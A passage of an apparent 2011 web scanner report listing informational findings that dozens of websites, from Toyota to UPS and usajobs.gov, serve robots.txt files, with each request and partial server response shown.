Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:05:23 GMT
Connection: close
Content-Length: 67

User-agent: *
Disallow: /issues/issue.aspx
Disallow: /gatekeeper/

24.842. http://www.toyota.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyota.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.toyota.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 24 Sep 2010 18:55:40 GMT
ETag: "4af0-264-ecc46300"
Accept-Ranges: bytes
Content-Length: 612
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:50:26 GMT
Connection: close

User-agent: *
Disallow: /images/
Disallow: /includes/
Disallow: /javascript/
Disallow: /ofsc/
Disallow: /tma/
Disallow: /toyota/html/
Disallow: /swfs/
Disallow: /yarisvsyaris/
Disallow: /flas
...[SNIP]...

24.843. http://www.toysrus.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toysrus.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.toysrus.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:24 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Sat, 29 Nov 2008 04:25:07 GMT
ETag: "540e73-17d-45ccc5ccf0ec0"
Accept-Ranges: bytes
Content-Length: 381
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:32:24 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /search/
Disallow: /cart/
Disallow: /reviews/
Disallow: /coreg/
Disallow: /fsrscripts/
Disallow: /cartHandler/
Disallow: /include/
Disallow: /ControllerServlet/
Disallow: /ema
...[SNIP]...

24.844. http://www.trafficrevenue.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trafficrevenue.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trafficrevenue.net

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:24:03 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "50-4af30a44-0"
Last-Modified: Thu, 05 Nov 2009 17:24:20 GMT
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=30, public

User-agent: *
Allow: /

Sitemap: http://www.trafficrevenue.net/sitemap.xml.gz

24.845. http://www.trails.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trails.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trails.com

Response

HTTP/1.0 200 OK
Content-Length: 132
Content-Type: text/plain
Last-Modified: Fri, 12 Nov 2010 01:15:56 GMT
Accept-Ranges: bytes
ETag: "abf67b28782cb1:4c9b4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:38:43 GMT
Connection: close

User-agent: *
Disallow: /cms/search.aspx
Disallow: /forums/
Disallow: /mytrails/
Sitemap: http://www.trails.com/sitemapindex.xml

24.846. http://www.travel-ticker.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travel-ticker.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.travel-ticker.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=941D0154378F9818A2B5697156633036; Path=/
Set-Cookie: SaneID=941D0154378F9818A2B569715663303; Expires=Sun, 06-Mar-2016 14:16:41 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"64-1300925852000"
Last-Modified: Thu, 24 Mar 2011 00:17:32 GMT
Content-Type: text/plain
Content-Length: 64
Date: Sat, 02 Apr 2011 14:16:41 GMT
Connection: keep-alive
Set-Cookie: NSC_xxx.usbwfm-ujdlfs-iuuq=ffffffffaf131c4645525d5f4f58455e445a4a422d6d;path=/;httponly

# Robots.txt

User-agent: *
Disallow: /details.jsp?actionType=1

24.847. http://www.travelocity.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.travelocity.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:28:08 GMT
Server: Apache
Set-Cookie: TVLY_GEO=|||||; path=/; domain=.travelocity.com; expires=Sat, 02-Apr-2011 16:28:08 GMT
Set-Cookie: tyrg1st=82141B20294E07DE; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.travelocity.com
Last-Modified: Tue, 24 Mar 2009 04:53:23 GMT
ETag: "43"
Accept-Ranges: bytes
Content-Length: 67
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /travelagency/
Disallow: /site/find/World/

24.848. http://www.travelpod.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelpod.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.travelpod.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:11 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.travelpod.com/siteindex.xml.gz
User-agent: *
Disallow: /akamai/
Disallow: /cgi-bin/accommodations-reviews.pl
Disallow: /cgi-bin/add_fav.cgi
Disallow: /cgi-bin/admin.pl
Disallow: /c
...[SNIP]...

24.849. http://www.travelzoo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelzoo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.travelzoo.com

Response

HTTP/1.0 200 OK
Content-Length: 1235
Content-Type: text/plain
Content-Location: http://www.travelzoo.com/robots.txt
Last-Modified: Thu, 30 Sep 2010 16:59:38 GMT
Accept-Ranges: bytes
ETag: "0f9b7ddc060cb1:2964"
Server: Microsoft-IIS/6.0
X-IP: 40
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Sat, 02 Apr 2011 13:32:46 GMT
Connection: close

User-agent: *
Disallow: /SuperSearchAjaxPages/
Disallow: /supersearchajaxpages/
Disallow: /destinations/preview/
Disallow: /Redirect.ashx
Disallow: /GeoDataAutocompleteHandler.ashx
Disallow: /su
...[SNIP]...

24.850. http://www.trendmicro.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trendmicro.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trendmicro.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
p3p: CP="NON DSP COR CUR CON TEL OUR OTR IND", policyref="http://www.trendmicro.com/w3c/p3p.xml"
nnCoection: close
Content-Type: text/plain
Last-Modified: Thu, 03 Apr 2008 09:01:11 GMT
ETag: "e579a7436995c81:14a0"
ntCoent-Length: 1273
Cache-Control: private, max-age=616045
Date: Sat, 02 Apr 2011 13:57:35 GMT
Content-Length: 1273
Connection: close

User-agent: gwm-gsa-crawler
Disallow: /_private/
Disallow: /banners/
Disallow: /cgi-bin/
Disallow: /channel/
Disallow: /channels/
Disallow: /housecall/
Disallow: /images/
Disallow: /logs/
Dis
...[SNIP]...

24.851. http://www.tripadvisor.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tripadvisor.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tripadvisor.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:18 GMT
Server: Apache
Set-Cookie: v1st=10C5B66BCFB983BD; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.tripadvisor.com
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TAUnique=%1%enc%3AvNugZEVLWFhd8LGI8QbYY0XbcR4szT2Mg7qfRf7ZLG8qtsCUykBtEA%3D%3D; Domain=.tripadvisor.com; Expires=Tue, 30-Mar-2021 12:43:18 GMT; Path=/
Set-Cookie: ServerPool=X; Domain=.tripadvisor.com; Path=/
Connection: close
Content-Type: text/plain;charset=UTF-8

User-agent: *
Disallow: /AccountManagement
Disallow: /ActionRecord
Disallow: /AddForumUser
Disallow: /AddUrl
Disallow: /AdServlet
Disallow: /AffiliateWidgets
Disallow: /AirlineRatingCreate
Disallow: /
...[SNIP]...

24.852. http://www.tripzen.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tripzen.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tripzen.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 02 Apr 2011 14:09:01 GMT
Content-Type: text/plain
Content-Length: 1521
Last-Modified: Sat, 21 Aug 2010 00:09:50 GMT
Connection: close
Accept-Ranges: bytes

User-agent: Googlebot
Disallow: /celebrity/*/talk
Disallow: /celebrity/*/fans
Disallow: /celebrity/*/quizzes
Disallow: /celebrity/*/videos
Disallow: /celebrity/*/photos
Disallow: /movie/*/fans
Disallo
...[SNIP]...

24.853. http://www.true.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.true.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.true.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 21 Jan 2010 19:07:09 GMT
Accept-Ranges: bytes
ETag: "c7cfeecc9aca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:37:40 GMT
Connection: keep-alive
Content-Length: 139
Set-Cookie: NSC_xxx-mc-hsq=445337273660;path=/;domain=true.com

User-agent: *
Disallow: /includes/
Disallow: /ajaxpro/
Disallow: /scripts/
Disallow: /styles/
Sitemap: http://www.true.com/Sitemap.xml

24.854. http://www.trulia.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trulia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trulia.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15 (EL)
Last-Modified: Wed, 30 Mar 2011 22:59:54 GMT
ETag: "18712cc8-7bc-49fbb2289ce80"
ntCoent-Length: 1980
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:35:54 GMT
Content-Length: 1980
Connection: close
Cache-Control: private

User-agent: *
Disallow: /slp/
Disallow: /include/
Disallow: /templates/
Disallow: /new_templates/
Disallow: /templates_save/
Disallow: /leave_feedback/
Disallow: /pictures/
Disallow: /images/
Disallo
...[SNIP]...

24.855. http://www.truste.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truste.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.truste.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:08 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch
Last-Modified: Thu, 31 Mar 2011 21:48:51 GMT
ETag: "1ae03d-2fa-49fce4248f6c0"
Accept-Ranges: bytes
Content-Length: 762
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /about/
Disallow: /assets/
Disallow: /channel/
Disallow: /channel_materials/
Disallow: /common/
Disallow: /eloqua/
Disallow: /elqNow
Disallow: /forms/
Disallow: /fundraising/
D
...[SNIP]...

24.856. http://www.tv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tv.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:35 GMT
Server: Apache
Last-Modified: Fri, 18 Feb 2011 22:41:50 GMT
Accept-Ranges: bytes
Content-Length: 475
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=1000
Connection: Keep-Alive
Content-Type: text/plain

# robots.txt for http://www.tv.com/

User-agent: *
Disallow: /users/
Disallow: /*get_items_for_tag
Disallow: /moderator-hangout/
Disallow: /usersubmission/
Disallow: /*action=abuse

#new for TVPROD-28
...[SNIP]...

24.857. http://www.tvguide.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tvguide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tvguide.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 11 Nov 2010 00:05:15 GMT
ETag: "ffe4281e3481cb1:1a2d"
Server: Microsoft-IIS/6.0
P3P: policyref=" /w3c/p3p.xml", CP="CAO PSA OUR BUS"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:25:54 GMT
Content-Length: 2206
Connection: close

# www.tvguide.com: robots.txt

User-agent: Googlebot
Disallow: /fap/
Disallow: /search/
Disallow: /Support/
Disallow:/*rss
Disallow:/*partnerid
Disallow:/*profileid
Disallow: /detail/detail_l
...[SNIP]...

24.858. http://www.tvtxtr.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tvtxtr.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tvtxtr.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 21 Sep 2010 00:48:39 GMT
Accept-Ranges: bytes
ETag: "b1ee64bb2659cb1:0"
Server: Microsoft-IIS/7.0
Date: Sat, 02 Apr 2011 14:16:50 GMT
Connection: close
Content-Length: 201
Set-Cookie: BIGipServerpool-173.203.135.154-TVT-WWW=2684463296.20480.0000; path=/

User-Agent: *
Disallow: /config/
Disallow: /handlers/
Disallow: /includes/
Disallow: /interceptors/
Disallow: /layouts/
Disallow: /logs/
Disallow: /model/
Disallow: /plugins/
Disallow: /views/
Allow:
...[SNIP]...

24.859. http://www.ucomparehealthcare.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ucomparehealthcare.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ucomparehealthcare.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:08 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Last-Modified: Fri, 28 Jan 2011 19:59:13 GMT
ETag: "11ad2fd4a-c77-49aed800b6640"
Accept-Ranges: bytes
Content-Length: 3191
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=44
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /6/ad/test.html

User-agent: *
Disallow: /marketing/

User-agent: *
Disallow: report.html

User-agent: *
Disallow: report2.html

User-agent: *
Disallow: /drs/report2.html

User
...[SNIP]...

24.860. http://www.ufc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ufc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ufc.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=UTF-8
Content-Length: 60
Date: Sat, 02 Apr 2011 14:06:04 GMT
Connection: close

User-agent: *
Disallow:
Sitemap: http://www.ufc.com/sitemap

24.861. http://www.uhaul.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uhaul.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uhaul.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 07 Oct 2010 15:09:06 GMT
Accept-Ranges: bytes
ETag: "5e1aaa953166cb1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: TLTSID=F9ECDBAF4FF89669DFCC93AF27D1A090; Path=/; Domain=.uhaul.com
Set-Cookie: TLTUID=F9ECDBAF4FF89669DFCC93AF27D1A090; Path=/; Domain=.uhaul.com; expires=Sat, 02-04-2021 13:57:30 GMT
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:57:29 GMT
Connection: close
Content-Length: 204

...User-agent: *
Disallow: /Admin/
Disallow: /Files/
Disallow: /TL/
Disallow: /UhaulNews/
Disallow: /publication.ashx
Disallow: /PubsHandler.ashx


Sitemap: http://www.uhaul.com/SitemapIndex.
...[SNIP]...

24.862. http://www.ultimate-guitar.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ultimate-guitar.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ultimate-guitar.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:34:26 GMT
Content-Type: text/plain
Connection: close
Content-Length: 561
Last-Modified: Fri, 24 Dec 2010 08:30:45 GMT
Accept-Ranges: bytes

User-agent: *
Crawl-delay: 1
Disallow: /mailto.php
Disallow: /forum/showthread.php?p=
Disallow: /forum/showpost.php
Disallow: /forum/printthread.php?t=
Disallow: /vote4.php
Disallow: /report_ba
...[SNIP]...

24.863. http://www.umich.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.umich.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.umich.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:44 GMT
Server: Apache
Last-Modified: Thu, 23 Mar 2006 17:19:28 GMT
ETag: "123fa9-108-40facb5ef6800"
Accept-Ranges: bytes
Content-Length: 264
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /cgi-data
Disallow: /cgi-bin
Disallow: /~websvcs/
Disallow: /%7Ewebsvcs/
Disallow: /~homepage/
Disallow: /%7Ehomepage/
Disallow: /~smartgl/
Disallow: /%7Esmartgl/

Disallow: /~
...[SNIP]...

24.864. http://www.univision.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.univision.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.univision.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 13:54:19 GMT
Content-length: 1197
Content-type: text/plain
Last-modified: Tue, 28 Dec 2010 19:29:34 GMT
Connection: keep-alive

User-agent: Googlebot
Disallow: /buscar/
Disallow: /common/
Disallow: /content/viewAudioProduct.jhtml*
Disallow: /content/viewGraphicProduct.jhtml*
Disallow: /content/viewAudioProduct1.jhtml*
Disallow
...[SNIP]...

24.865. http://www.ups.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ups.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:16 GMT
Server: Apache
Last-Modified: Fri, 28 Jan 2011 14:05:11 GMT
Accept-Ranges: bytes
Content-Length: 166
Vary: User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /content/us/en/preferred/lws_2.html
Disallow: /content/us/en/preferred/lws_1.html
Disallow: /content/us/en/preferred/lws_index.html
Allow: /


24.866. http://www.uptake.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uptake.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uptake.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 02 Apr 2011 13:58:15 GMT
Content-Type: text/plain
Content-Length: 2697
Last-Modified: Fri, 08 Oct 2010 22:54:33 GMT
Connection: close
Expires: Mon, 02 May 2011 13:58:15 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

User-agent: *
Disallow: /cms_admin
Disallow: /stylesheets
Disallow: /javascripts
Disallow: /embedded
Disallow: /redirect
Disallow: /search
Disallow: /reviews
Disallow: /static/popup.html
Disallow: /de
...[SNIP]...

24.867. http://www.urbanspoon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.urbanspoon.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.urbanspoon.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 02 Apr 2011 13:44:45 GMT
Content-Type: text/plain
Content-Length: 1295
Last-Modified: Wed, 21 Jul 2010 22:04:48 GMT
Connection: close
Expires: Sat, 02 Apr 2011 14:14:45 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes

User-agent: Googlebot
Disallow: /u/
Disallow: /m/u/
Disallow: /e/
Disallow: /s/
Disallow: /s?

User-agent: Googlebot-Mobile
Disallow: /u/
Disallow: /m/u/
Disallow: /e/
Disallow: /s/

User-agent: Media
...[SNIP]...

24.868. http://www.usa-people-search.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usa-people-search.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usa-people-search.com

Response

HTTP/1.1 200 OK
Content-Length: 199
Content-Type: text/plain
Last-Modified: Thu, 30 Jul 2009 17:19:10 GMT
Accept-Ranges: bytes
ETag: "0bbe5d93911ca1:2ca"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:38:55 GMT
Connection: close
Set-Cookie: iqf5cookie=369600704.20480.0000; path=/

User-agent: *
Disallow: /Order.aspx
Disallow: /order.aspx
Disallow: /Results.aspx
Disallow: /results.aspx
Crawl-delay: 3

User-agent: MediaPartners-Google
User-agent: Adsbot-Google
Disallow:

24.869. http://www.usajobs.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usajobs.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usajobs.gov

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 03 Aug 2010 11:00:02 GMT
Accept-Ranges: bytes
ETag: "c038e95fb32cb1:0"
Server: Microsoft-IIS/7.5
Date: Sat, 02 Apr 2011 13:35:33 GMT
Connection: close
Content-Length: 111

# Disallow all web spiders
User-agent: *
Disallow: /include/
Disallow: /scripts/
Disallow: /stylesheets/
   

24.870. http://www.usatoday.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:30 GMT
Accept-Ranges: bytes
ETag: "0eda5b4165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sat, 02 Apr 2011 13:32:43 GMT
Connection: close
Content-Length: 1660

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

24.871. http://www.usbank.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usbank.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usbank.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 05 Apr 2006 17:13:36 GMT
Accept-Ranges: bytes
ETag: "0602846d458c61:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:33:32 GMT
Connection: close
Content-Length: 299

# Welcome to robots.txt on USBank.com -- sit down, relax, and have a cup of coffee while you look around. Have a nice day.
#
User-agent: *
Disallow: /js/
Disallow: /images/
Disallow: /test/
Disa
...[SNIP]...

24.872. http://www.use.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.use.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.use.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:20 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Thu, 27 Aug 2009 04:04:54 GMT
Accept-Ranges: bytes
Content-Length: 4606
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /ads/
User-agent: Nutch
Disallow: /
User-agent: Jetbot/1.0
Disallow: /
User-agent: Jetbot
Disallow: /
User-agent: WebVac
Disallow: /
User-agent: naver
Disallow: /
User-agent: d
...[SNIP]...

24.873. http://www.usgs.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usgs.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usgs.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:32 GMT
Last-Modified: Wed, 15 Sep 2010 20:15:09 GMT
Content-Type: text/plain
ETag: "383376c6-1d-49051fc732d41"
Accept-Ranges: bytes
Server: Footprint Distributor V4.6
Content-Length: 29
Connection: close

User-agent:*
Disallow: /faq/

24.874. http://www.usmagazine.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usmagazine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usmagazine.com

Response

HTTP/1.0 200 OK
Server: nginx/0.6.36
Content-Type: text/plain
Last-Modified: Thu, 22 Apr 2010 19:57:46 GMT
Content-Length: 305
X-Varnish: 2023612604
X-N: S
Date: Sat, 02 Apr 2011 13:26:43 GMT
Connection: close

#User-agent: Mediapartners-Google
#Disallow:
sitemap: http://www.usmagazine.com/sitemap.xml
User-agent: google-flipperbot
Disallow:
User-agent: *
Disallow: /services/adtestHome
Disallow: /services/adt
...[SNIP]...

24.875. http://www.usps.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usps.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usps.com

Response

HTTP/1.0 200 OK
Server: Netscape-Enterprise/6.0
Cteonnt-length: 712
Content-Type: text/plain
ETag: "18ee00fa-59-0-2c8"
Last-Modified: Wed, 11 Feb 2009 18:42:14 GMT
Cache-Control: no-cache, must-revalidate
Date: Sat, 02 Apr 2011 12:43:49 GMT
Content-Length: 712
Connection: close

User-agent: usps-gsa-crawler
Disallow: /it/

User-agent: *
Disallow: /access
Disallow: /atlanta
Disallow: /capdistrict
Disallow: /cgi-bin
Disallow: /cpim
Disallow: /cps
Disallow: /feedback
Disallow: /
...[SNIP]...

24.876. http://www.ussearch.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ussearch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ussearch.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:44 GMT
Server: Apache
Last-Modified: Fri, 17 Sep 2010 01:52:51 GMT
ETag: "287beb-e0-4906ad20022c0"
Accept-Ranges: bytes
Content-Length: 224
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

#Update Robot.txt per Robert's new specifications
User-agent: *
Disallow: /consumer/commerce/property/
Disallow: /consumer/people-search/names/fl+gainesville/somkanya/das.html
Sitemap: http://www.u
...[SNIP]...

24.877. http://www.ustream.tv/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ustream.tv
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ustream.tv

Response

HTTP/1.0 200 OK
Server: Apache
Pragma: no-cache
X-RSRC: w18
Content-Length: 86
Content-Type: text/plain; charset=UTF-8
Cache-Control: public, max-age=107
Expires: Sat, 02 Apr 2011 13:37:21 GMT
Date: Sat, 02 Apr 2011 13:35:34 GMT
Connection: close
X-N: S

User-agent: *
Allow: /
Disallow: /dunk/followers
Disallow: /SouljaBoyTellem/followers

24.878. http://www.utorrent.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.utorrent.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.utorrent.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 14:14:12 GMT
Content-Type: text/plain
Content-Length: 112
Last-Modified: Sat, 05 Mar 2011 13:27:07 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /skins/vote/
Disallow: /skins/edit/
Disallow: /skins/create
Disallow: /skins/create/

24.879. http://www.va.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.va.gov
Path:   /favicon.ico
